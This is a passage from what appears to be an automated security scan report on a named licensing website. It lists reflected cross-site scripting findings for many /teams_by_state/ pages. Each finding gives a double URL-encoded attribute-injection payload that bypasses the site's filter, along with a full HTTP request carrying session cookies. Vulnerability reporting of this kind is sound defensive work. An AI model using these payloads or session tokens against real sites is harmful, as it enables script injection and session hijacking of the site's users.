The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Connecticut?6b72d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527146d7de1dc2=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.192. http://www.turnerlicensing.com/teams_by_state/Delaware [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Delaware
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e8bba%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f6b9aaa7370 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e8bba'style='x:expression(alert(1))'f6b9aaa7370 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Delaware?e8bba%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f6b9aaa7370=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.193. http://www.turnerlicensing.com/teams_by_state/Edmonton [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Edmonton
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dbb0f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527eba22f9b445 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dbb0f'style='x:expression(alert(1))'eba22f9b445 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Edmonton?dbb0f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527eba22f9b445=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.194. http://www.turnerlicensing.com/teams_by_state/Florida [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Florida
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6608e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527462ed1390c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6608e'style='x:expression(alert(1))'462ed1390c5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Florida?6608e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527462ed1390c5=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.195. http://www.turnerlicensing.com/teams_by_state/Georgia [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Georgia
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cd6fd%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252766d636fc045 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cd6fd'style='x:expression(alert(1))'66d636fc045 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Georgia?cd6fd%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252766d636fc045=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.196. http://www.turnerlicensing.com/teams_by_state/Hawaii [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Hawaii
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8d2a5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278b5f9f5f3a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8d2a5'style='x:expression(alert(1))'8b5f9f5f3a5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Hawaii?8d2a5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278b5f9f5f3a5=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.197. http://www.turnerlicensing.com/teams_by_state/Idaho [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Idaho
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1b675%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252773c56e3d4b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1b675'style='x:expression(alert(1))'73c56e3d4b3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Idaho?1b675%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252773c56e3d4b3=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.198. http://www.turnerlicensing.com/teams_by_state/Illinois [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Illinois
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a8939%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527a322cf42a27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a8939'style='x:expression(alert(1))'a322cf42a27 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Illinois?a8939%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527a322cf42a27=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.199. http://www.turnerlicensing.com/teams_by_state/Indiana [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Indiana
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ddb83%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252731d9a9bbd80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ddb83'style='x:expression(alert(1))'31d9a9bbd80 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Indiana?ddb83%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252731d9a9bbd80=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.200. http://www.turnerlicensing.com/teams_by_state/Iowa [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Iowa
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7a3d8%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252757114ddf99c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7a3d8'style='x:expression(alert(1))'57114ddf99c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Iowa?7a3d8%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252757114ddf99c=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.201. http://www.turnerlicensing.com/teams_by_state/Kansas [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Kansas
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b1e4f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252777e22b95d60 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b1e4f'style='x:expression(alert(1))'77e22b95d60 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Kansas?b1e4f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252777e22b95d60=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.202. http://www.turnerlicensing.com/teams_by_state/Kentucky [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Kentucky
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7860b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527bb84182b6d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7860b'style='x:expression(alert(1))'bb84182b6d5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Kentucky?7860b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527bb84182b6d5=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.203. http://www.turnerlicensing.com/teams_by_state/Louisiana [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Louisiana
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e214f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278a4ef989e82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e214f'style='x:expression(alert(1))'8a4ef989e82 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Louisiana?e214f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278a4ef989e82=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.204. http://www.turnerlicensing.com/teams_by_state/Maryland [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Maryland
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload baba6%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252786c1a467bc1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as baba6'style='x:expression(alert(1))'86c1a467bc1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Maryland?baba6%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252786c1a467bc1=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.205. http://www.turnerlicensing.com/teams_by_state/Massachusetts [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Massachusetts
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 24d7e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527473118b635c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 24d7e'style='x:expression(alert(1))'473118b635c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Massachusetts?24d7e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527473118b635c=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.206. http://www.turnerlicensing.com/teams_by_state/Michigan [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Michigan
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c4c53%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527cbce184105d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c4c53'style='x:expression(alert(1))'cbce184105d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
